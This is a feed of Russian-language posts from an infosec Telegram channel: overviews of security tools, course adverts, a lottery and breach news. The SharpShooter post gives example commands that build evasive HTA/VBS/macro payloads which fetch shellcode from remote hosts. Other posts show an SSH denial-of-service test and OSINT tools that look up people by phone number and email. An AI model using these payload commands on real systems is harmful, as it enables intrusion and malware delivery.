34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
💫 Перед вами — четыре снимка с мест событий, собранные в одно дело. Сможете вычислить угрозу?
1. Какой термин скрывается за этими кадрами?
2. Какой его главный и самый опасный принцип?
Включайте режим сыска. Сопоставляйте улики, стройте версии. Ваши теории ждём в комментариях!💻
🦈 SharpShooter
Фреймворк для создания полезных нагрузок, предназначенный для загрузки и выполнения произвольного исходного кода на C#. Инструмент может создавать полезные нагрузки в различных форматах, включая HTA, JS, VBS и WSF. Используется DotNetToJavaScript для вызова методов из сериализованного .NET-объекта SharpShooter.
Полезные нагрузки можно получать через веб или DNS, либо через оба канала одновременно. Также возможна генерация stageless полезных нагрузок со встроенным выполнением шелл-кода.
Созданные полезные нагрузки шифруются алгоритмом RC4 со случайным ключом для базового обхода антивирусов. Фреймворк также включает возможности обнаружения песочниц и привязки к окружению для повышения скрытности.
Поддерживает возможность упаковывать полезную нагрузку в HTML-файл с использованием техники Demiguise HTML smuggling.
⚡️ Установка
git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl
SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl
Unicornscan: Высокоскоростной асинхронный сканер для сетевой разведки
Unicornscan — это асинхронный инструмент для сетевой разведки и аудита безопасности, предназначенный для быстрой доставки сетевых стимулов и записи ответов. Его ключевое отличие от традиционных сканеров (таких как Nmap) — асинхронная, масштабируемая архитектура, позволяющая достигать высокой скорости сканирования (25.000+ пакетов в секунду), что делает его отличным выбором для обследования больших сетей.
sudo apt install unicornscan
unicornscan -h
sudo unicornscan -mT -p 1-1024 -I -E -vvv 192.168.1.100
sudo unicornscan -i eth0 -r 2000 -t 64 -p a 10.0.0.0/24
unicornscan -mTsFPU -s r -w scan_capture.pcap -p 22,80,443 192.168.1.50
Защита от прослушки: практический взгляд без мифов
Средства негласного получения информации давно вышли за пределы спецслужб.
Диктофоны, радиопередатчики, BLE-трекеры и модифицированные устройства свободно доступны и регулярно используются в мошенничестве, корпоративных конфликтах и бытовых инцидентах.
Понимание принципов их работы — базовый навык для специалистов по безопасности, OSINT и технической разведке.
Мы подготовили PDF-гайд
«Инструкция: защита от популярных методов прослушки» — авторский материал от эксперта OSINT.
В гайде разобрано:
🟧 классификация устройств скрытого наблюдения: записывающие и транслирующие
🟧 диктофоны, радиожучки, GSM/LTE-трекеры, BLE/UWB-метки и нестандартные решения
🟧 ключевые демаскирующие признаки: питание, радиоканалы, конструктив
🟧 методы обнаружения: визуальный контроль, радиомониторинг, анализ спектра
🟧 практические способы противодействия в быту, офисе и автомобиле
Материал ориентирован на реальные сценарии, без художественных допущений и маркетинговых преувеличений.
➡️Скачать гайд бесплатно
https://wipro-guide.codeby.school/
Гайд будет полезен:
✅ специалистам ИБ и OSINT
✅ техническим и управленческим сотрудникам
✅ тем, кто работает с чувствительной информацией
В конце гайда — рекомендации по дальнейшему профессиональному развитию в области разведки и анализа данных.
➡️Перейти к гайду
https://wipro-guide.codeby.school/
🎓Web Cache Vulnerability Scanner (WCVS)
Быстрый и универсальный CLI-сканер для обнаружения уязвимостей отравления веб-кэша (web cache poisoning) и обмана веб-кэша (web cache deception).
Сканер поддерживает множество различных техник отравления и обмана веб-кэша, включает встроенный краулер для обнаружения дополнительных URL-адресов для тестирования, а также способен адаптироваться к конкретному веб-кэшу для более эффективного сканирования. Инструмент обладает широкими возможностями настройки и легко интегрируется в существующие CI/CD-пайплайны.
Установка
1️⃣Готовые двоичные файлы WCVS доступны на странице релизов.
2️⃣ Kali Linux: apt install web-cache-vulnerability-scanner.
3️⃣ Установка с помощью Go: go install -v github.com/Hackmanit/Web-Cache-Vulnerability-Scanner@latest.
⌨️Использование
Инструмент обладает широкими возможностями настройки с помощью флагов. Многие флаги могут содержать непосредственно значение или путь к файлу.
😳 Единственный обязательный флаг -u/--url — указывает на целевой URL-адрес, который необходимо проверить на предмет отравления/обмана веб-кэша. Целевой URL-адрес может быть указан в разных форматах.
Для проверки половины методов WCVS нужны два списка слов: один со словами из заголовков, а другой — со словами из параметров. Списки слов могут находиться в том же каталоге, из которого запускается WCVS, или быть указаны с помощью флагов --headerwordlist/-hw и --parameterwordlist/-pw.
wcvs -u https://example.com
wcvs -u https://example.com -hw "file:/home/user/Documents/wordlist-header.txt" -pw "file:/home/user/Documents/wordlist-parameter.txt"
wcvs -u https://example.com -r 5 -red /home/user/Documents/mydomains.txt
wcvs -u https://example.com -r 5 -rl 2
📱 Mobile Verification Toolkit (MVT) 📲📲
Набор утилит для упрощения и автоматизации процесса сбора данных для криминалистической экспертизы, которые помогают выявить потенциальную компрометацию устройств на базе Android и iOS.
python3 -m venv env
source env/bin/activate
pip install mvt
#OR
pipx install --force git+https://github.com/mvt-project/mvt.git
mvt-ios и mvt-android.mvt-ios decrypt-backup [OPTIONS] BACKUP_PATH
mvt-ios check-backup --output /path/to/output/ /path/to/backup/udid/
mvt-android download-apks --output /path/to/folder
MVT_VT_API_KEY=<key> mvt-android download-apks --output /path/to/folder --virustotal
mvt-android check-adb --output /path/to/results
H4X-Tools
H4X-Tools - Набор инструментов с открытым исходным кодом для сбора данных, OSINT и многого другого.
📕Характеристика:
Веб-поиск: Выполняет поиск в Интернете по заданному запросу.
Поиск номера телефона: Ищет номер телефона и возвращает информацию о нем.
Сканер Портов: Сканирует открытые порты по заданному IP-адресу/домену.
Поиск по нику: Пытается найти заданное имя пользователя на многих разных веб-сайтах.
Поиск по почте: Эффективно находит зарегистрированные аккаунты по заданному адресу электронной почты.
💻Установка:
git clone https://github.com/vil/H4X-Tools.git
cd H4X-Tools
pip3 install -r requirements.txt --break-system-packages
python3 h4xtools.py
#osint #cybersecurity
📣ПОСЛЕДНИЙ ШАНС! ИТОГИ НОВОГОДНЕЙ ЛОТЕРЕИ CODEBY УЖЕ СЕГОДНЯ!🎁
Сегодня в 21:00 (МСК) определим 10 победителей в прямом эфире!
У вас еще есть время, чтобы войти в число участников на: iPhone 17, Apple Watch, AirPods и подписки HackerLab PRO.
Для этого нужно приобрести любой курс стартующий в 2026 году. Каждая покупка — ваш лотерейный билет.
⌛Розыгрыш: СЕГОДНЯ, 12 января, 21:00 МСК.
✅ Выбрать курс и успеть участвовать
🥇 Для связи с менеджером @CodebyAcademyBot
🔗Ознакомиться с условиями розыгрыша здесь!
Не упустите свой шанс на новогодний подарок от CODEBY! Удачи!
#онлайнобучение #курсыиб #розыгрыш #кодебай #cybersecurity
SSH-Audit: Комплексный аудит конфигураций SSH-серверов и клиентов
SSH-Audit — это инструмент командной строки, предназначенный для глубокого анализа конфигурации безопасности SSH на удаленных серверах и клиентах. Его основная задача — проверка поддерживаемых алгоритмов обмена ключами, шифрования, аутентификации сообщений, а также выявление устаревших, слабых или небезопасных настроек путем пассивного сбора информации от целевого хоста. В отличие от ручной проверки, SSH-Audit предоставляет структурированный, детальный отчет с цветовой индикацией рисков и конкретными рекомендациями по исправлению.
sudo apt install ssh-audit
ssh-audit -h
ssh-audit 192.168.1.100
ssh-audit -p 2222 example.com
ssh-audit --targets=hosts.txt --policy="OpenSSH 8.9" --threads=10
--targets указывается файл со списком хостов (по одному на строку, в формате хост:порт). Флаг --policy запускает проверку каждого хоста на соответствие заданной встроенной политике безопасности, а --threads управляет параллелизмом сканирования для ускорения процессаssh-audit --dheat=5:diffie-hellman-group-exchange-sha256 example.com
--dheat активирует тест для проверки уязвимости CVE-2002-20001 (DHEat), который может привести к отказу в обслуживании. В данном примере тест выполняется с 5 одновременными соединениями, используя указанный алгоритм обмена ключами
🎄 НОВОГОДНЯЯ ЛОТЕРЕЯ CODEBY🎄
ИТОГИ УЖЕ ЗАВТРА! РОЗЫГРЫШ В ПРЯМОМ ЭФИРЕ 12 ЯНВАРЯ В 21:00 МСК!
Дорогие друзья!
Команда CODEBY поздравляет вас с наступившим Новым годом! Спасибо, что выбираете нас — нам очень приятно видеть, как наши студенты превращаются в специалистов высшего класса.
Именно поэтому мы решили сделать вам новогодние подарки! 🎁
📣ОБЪЯВЛЯЕМ ЛОТЕРЕЮ
Как участвовать:
• Купите любой курс, стартующий в 2026 году
• Получите индивидуальный номер участника
• Чем больше курсов — тем выше шансы на победу!
Период проведения:
🗓26 декабря 2025 — 12 января 2026
⭐ Розыгрыш в прямом эфире 12 января в 21:00 МСК
🏆 ПРИЗОВОЙ ФОНД
🥇 1 место — iPhone 17
🥈 2 место — Apple Watch
🥉 3 место — AirPods
🎁 4-10 места — подписка HackerLab PRO на 1 месяц
Итого: 10 победителей!
🚀Успей принять участие — времени остается все меньше!
➡️ Выбрать курс
🥇 Для связи с менеджером @CodebyAcademyBot
Всем желаем удачи! 🚀
Ознакомиться с условиями розыгрыша здесь!
#онлайнобучение #курсыиб #розыгрыш #кодебай #cybersecurity
Информативная картинка о том, как работает LFI и что это такое.
#LFI #Web #Picture
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
🎄 НОВОГОДНЯЯ ЛОТЕРЕЯ CODEBY 🎄
Дорогие друзья!
Команда CODEBY поздравляет вас с наступившим Новым годом! Спасибо, что выбираете нас — нам очень приятно видеть, как наши студенты превращаются в специалистов высшего класса.
Именно поэтому мы решили сделать вам новогодние подарки! 🎁
📣ОБЪЯВЛЯЕМ ЛОТЕРЕЮ
Как участвовать:
• Купите любой курс, стартующий в 2026 году
• Получите индивидуальный номер участника
• Чем больше курсов — тем выше шансы на победу!
Период проведения:
🗓26 декабря 2025 — 12 января 2026
⭐ Розыгрыш в прямом эфире 12 января в 21:00 МСК
🏆 ПРИЗОВОЙ ФОНД
🥇 1 место — iPhone 17
🥈 2 место — Apple Watch
🥉 3 место — AirPods
🎁 4-10 места — подписка HackerLab PRO на 1 месяц
Итого: 10 победителей!
🚀Успей принять участие — времени остается все меньше!
➡️ Выбрать курс
🥇 Для связи с менеджером @CodebyAcademyBot
Всем желаем удачи! 🚀
Ознакомиться с условиями розыгрыша здесь!
#онлайнобучение #курсыиб #розыгрыш #кодебай #cybersecurity
🚩 Новые задания на платформе HackerLab!
🔎 Категория OSINT — Президент фонда
Приятного хакинга!
🎁 Подводим итоги года. Специалистами на основе анализа общедоступной информации об уязвимостях в базе CVE был составлен список CWE Top 25 за 2025 год. В набор данных за этот год вошли наиболее серьезные и распространенные уязвимости из 39 080 записей CVE.
CWE содержит более 900 уязвимостей, которые варьируются от абстрактных и концептуальных до конкретных, связанных с технологиями или языками. У конкретной уязвимости есть родительская уязвимость, которая является более абстрактной и может иметь собственные родительские уязвимости и так далее.
⚽️ BloodSOCer
Инструмент автоматизации на Python, который собирает данные об угрозах из нескольких источников (Mitre ATT&CK, правила Sigma, Atomic Red Team) и создает файлы JSON для загрузки в BloodHound в формате OpenGraph.
BloodSOCer также может загружать файлы в BloodHound и устанавливать значки для пользовательских объектов, если в конфигурации указаны токены API. Затем аналитики по безопасности могут визуализировать данные под любым углом. Для начала работы предлагается несколько запросов Cypher.
Идея этого проекта заключается в том, чтобы помочь SOC-отделам составить карту охвата фреймворка Mitre ATT&CK и быстро определить «слепые зоны» во время реагирования на инциденты.
git clone https://github.com/yourusername/BloodSOCer.git
cd BloodSOCer
pip3 install -r requirements.txt
apikey = "your-api-key-here"
apiid = "your-api-id-here"
python3 BloodSOCer.py --mitre, -m
python3 BloodSOCer.py --sigma, -s
python3 BloodSOCer.py --art, -r
python3 BloodSOCer.py --mitre --sigma --define-icons
python3 BloodSOCer.py --clear-db
🚩 Новые задания на платформе HackerLab!
🕵️ Категория Форензика — Следопыт
🎢 Категория Разное — APT
Приятного хакинга!
Сегодня ИБ — это не только политики и регламенты, но и автоматизация.
Python помогает решать задачи эффективнее и масштабнее.
Какие библиотеки используете вы? Пишите в комментариях ⬇️
Для тех, кто только начинает свой путь в автоматизации ИБ, отличным стартом станет курс «Основы программирования на Python». Начните обучение 19 января.
#python #автоматизация #libs
➡ Все наши каналы 💬Все наши чаты ⚡ Для связи с менеджером
🔍 rnsec — это лёгкий сканер безопасности для React Native и Expo‑приложений, который ищет уязвимости, секреты и ошибки конфигурации до выхода в прод. Утилита работает из коробки одной командой, полностью локально и отлично подходит для встраивания в CI/CD.
⚙️ Основные возможности rnsec
➡️ Анализирует исходники мобильных приложений на React Native и Expo с учётом их типичных паттернов и анти‑паттернов.
➡️ Покрывает Android и iOS, включая платформенные настройки и конфиги (сетевые политики, storage и др.).
➡️ Детектирует небезопасное хранение данных (например, чувствительные данные в AsyncStorage), HTTP‑трафик без шифрования, слабую аутентификацию, рискованные WebView‑настройки и прочие misconfig‑ошибки.
➡️ Использует разбор AST (Abstract Syntax Tree) вместо простого поиска по строкам, что уменьшает шум и ложные срабатывания.
➡️ Генерирует HTML‑дашборд с удобной навигацией по находкам и JSON‑отчёты для автоматической обработки.
⬇️ Установка и запуск
rnsec распространяется через npm как глобальная CLI‑утилита.
npm install -g rnsec
cd /path/to/your-react-native-app
rnsec scan
rnsec scan
rnsec scan --path /Users/dev/my-react-native-app
rnsec scan --html security-report.html --output security.json
PH0MBER
PH0MBER — это платформа OSINT, представляющая собой универсальный инструмент для сбора информации и проведения разведки.
Это может помочь вам собрать информацию (например, номера телефонов, IP-адреса, данные о доменных именах и т. д.) из различных общедоступных источников о целевом объекте.
Утилита похожа на MetaSploit Framework по внешнему виду и управлению. Программа не обладает большим или сложным функционалом и подойдёт даже новичкам.
📕Характеристика:
1️⃣Поиск по номеру телефона
2️⃣Поиск по IP-адресу
3️⃣Поиск по MAC-адресу
4️⃣Поиск информации через whois
5️⃣Поиск по имени пользователя
📌Установка:
git clone https://github.com/s41r4j/phomber.git
cd phomber
pip3 install mac-vendor-lookup
python3 phomber.py
phone <NUMBER>
whois <DOMAIN>
🔔 Хотите понять, как проходит WAPT — тестирование на проникновение? Сегодня разберем это подробнее!
Освойте WAPT на практике — старт курса по тестированию веб-приложений на проникновение 22 января!
#WAPT #XSS #OWASP
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
📱 В январе 2026 года в медиапространстве появилась новость: произошла утечка данных 17,5 миллионов аккаунтов Instagram*. Однако официальные заявления Meta* и технические детали от экспертов по кибербезопасности раскрывают более сложную картину.
💫Что стало известно из расследования?
Согласно отчету компании по кибербезопасности Malwarebytes, история началась 7 января 2026 года, когда на хакерском форуме BreachForums были опубликованы крупные структурированные файлы (JSON и TXT) с данными. Их происхождение связывают с хакером под псевдонимом «Solonik».
Какие данные были обнародованы:
- Имена пользователей (логины) и полные имена
- Адреса электронной почты
- Международные номера телефонов
- Частичные физические адреса
- Внутренние идентификаторы пользователей (User IDs)
Важно: в утечке не фигурировали пароли пользователей. Эксперты Malwarebytes предполагают, что источником утечки мог быть инцидент, связанный с API Instagram*, который произошел еще в 2024 году.
«Мы устранили проблему, которая позволяла внешней стороне запрашивать письма для сброса пароля для некоторых людей. Не было взлома наших систем, и ваши аккаунты в Instagram защищены. Вы можете игнорировать эти письма — приносим извинения за возможную путаницу».
🎄 НОВОГОДНЯЯ ЛОТЕРЕЯ CODEBY — ИТОГИ 🎄
Друзья, спасибо всем, кто принял участие в нашей новогодней лотерее!
Мы рады объявить 10 победителей:
🥇 1 место — iPhone 17
Номер участника: 102
🥈 2 место — Apple Watch
Номер участника: 314
🥉 3 место — AirPods
Номер участника: 307
🎁 4–10 места — подписка HackerLab PRO на 1 месяц
Номера участников:
105
313
300
101
312
303
206
Поздравляем всех победителей! ❤️
Спасибо, что учитесь и развиваетесь вместе с нами!
Что делать победителям?
Пожалуйста, напишите нам в личные сообщения @CodebyAcademyBot в течение 48 часов для получения приза согласно регламенту.
📌 Видео с розыгрышем в посте
Напоминаем: в Академии Кодебай в 2026 продолжается обучение по ключевым направлениям кибербезопасности, а также доступны подарочные сертификаты на курсы — отличный старт в Новом году.
Спасибо, что вы с нами.
До встречи на обучении и в следующих розыгрышах! 😎
#кодебай #розыгрыш #итоги #онлайнобучение #курсыиб #cybersecurity
Ваши данные уже в сети. Вы уверены, что они в безопасности?
Знаете ли вы, что:
- 92% людей даже не подозревают, какая информация о них есть в открытом доступе
- Ваши старые аккаунты на форумах и в соцсетях до сих пор можно найти
- Фото с геометками из отпуска 5-летней давности могут указать ваш домашний адрес
- Пароли из утечек 2010-х годов до сих пор используют для взлома аккаунтов
Ваши данные уже ищут — научитесь защищаться!
Что даст курс:
- Поиск своих "утекших" данных
- Удаление личной информации из сетей
- Настройки приватности, которые работают
- Методы безопасного серфинга
✅ 92% людей не контролируют свой цифровой след — будьте в меньшинстве!
🔴 Начать обучение запись до 26 января!
✈️По всем вопросам @CodebyAcademyBot
Друзья, давайте немного бустанем канал: /channel/boost/codeby_sec
Читать полностью…
🚩 Новые задания на платформе HackerLab!
🌍 Категория Веб — Хаос на АЗС
Приятного хакинга!
Европейское космическое агентство (ESA) под хакерскими атаками.
Европейское космическое агентство, основанное 50 лет назад и имеющее штаб-квартиру в Париже, является межправительственной организацией, которая координирует космическую деятельность 23 государств-членов. Учитывая роль ESA в освоении космоса, инциденты, связанные с участием агентства имеют повышенное стратегическое значение.
* — организация признана экстремистской и запрещена на территории РФ
📜Сможете ли вы разгадать, какие главные киберугрозы зашифрованы в этих старинных научных иллюстрациях?
Делитесь своими догадками в комментариях!💫
🎄 Друзья, с наступающим Новым годом! 🎄
Этот год был для нас особенным. Где-то сложным, а где-то по-настоящему вдохновляющим.
Мы видели, как Вы росли.
Как «просто интересуюсь информационной безопасностью» перерастало в реальные навыки, офферы, участие в CTF, работу в SOC, пентесте и в настоящую практику. И это – то, ради чего мы всё и делаем.
И главное — Вы были с нами.
Спасибо за доверие,
💚 Ваш Codeby
📖Друзья, напоминаем, на каких курсах начинается обучение в январе!
☃️Новый год — отличное время, чтобы выбрать для себя новое направление, реализовать давние планы и вложиться в своё развитие. Пусть праздничное настроение вдохновит вас на важные решения!
Старт 19 января:
✨Курс «Основы программирования на Python» — овладеем самым попуярным ЯП за 2 месяца.
Старт 22 января:
✨Курс «Тестирование Веб-приложений на проникновение (WAPT)» — отработаем полный цикл тестирования: от разведки до пост-эксплуатации.
Старт 26 января:
✨Курс «Специалист центра мониторинга инцидентов информационной безопасности (SOC)» — освоите полный цикл работы: от обнаружения киберугроз до расследования инцидентов.
✨Курс «OSINT: технология боевой разведки» — освоим профессиональный поиск информации и анализ данные из открытых источников.
✏️Запишитесь у нашего менеджера @CodebyAcademyBot
Или узнайте подробности и программы курсов — на нашем 🤍 сайте
Как работает сеть NAT, полезное изображения для общего понимания принципа
#NAT #Сети
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером